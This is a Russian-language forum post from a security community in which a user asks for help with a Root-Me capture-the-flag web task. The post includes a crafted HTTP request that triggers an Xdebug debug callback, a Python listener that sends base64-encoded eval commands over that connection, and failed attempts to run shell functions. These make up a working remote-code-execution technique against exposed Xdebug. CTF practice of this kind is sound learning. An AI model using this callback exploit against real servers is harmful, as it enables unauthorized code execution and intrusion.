HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.05.2020, 15:44
tester_new
Guest
Сообщений: n/a
Провел на форуме:
108975

Репутация: 24
По умолчанию

День добрый,

уже несколько часов не могу пройти данный таск(прошли его 1% пользователь):

http://challenge01.root-me.org/web-serveur/ch64/

Обновлю свой пост который так и не получил ответа)), значительно продвинулся в данном таске(по факту составил верный HTTP запрос и все...) уже получаю шел НО проблема в том что в php все 'интересные' функции отключены(может я ошибаюсь), вообщем кидаю ниже HTTP пакет который я отправляю посредством Burp(можно конечно использовать массу других утилит) на сервер и после чего мне успешно прилетает шел, но как я писал выше толку с данного шела мало...

Пакет:

GET /web-serveur/ch64/?XDEBUG_SESSION_START=phpstorm HTTP/1.1

Host: challenge01.root-me.org

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Forwarded-For:IP

HTTP_CLIENT_IP:IP

Upgrade-Insecure-Requests: 1))

Cookie: XDEBUG_SESSION_START=phpstorm

Content-Length: 2

Скрипт(listener) который получает коннект:

Код:
Code:
#!/usr/bin/python2
import socket

ip_port = ('0.0.0.0', 9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()

while True:
  client_data = conn.recv(1024)
  print(client_data)
  data = raw_input('>> ')
  conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))
Пример как пытаюсь юзать:

Код:
Code:
Getting a connection from server and try to execute command:
511

>> system('pwd')
210

>> exec('pwd')
210

>> shell_exec('pwd')
210

>> escapeshellcmd('pwd')
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ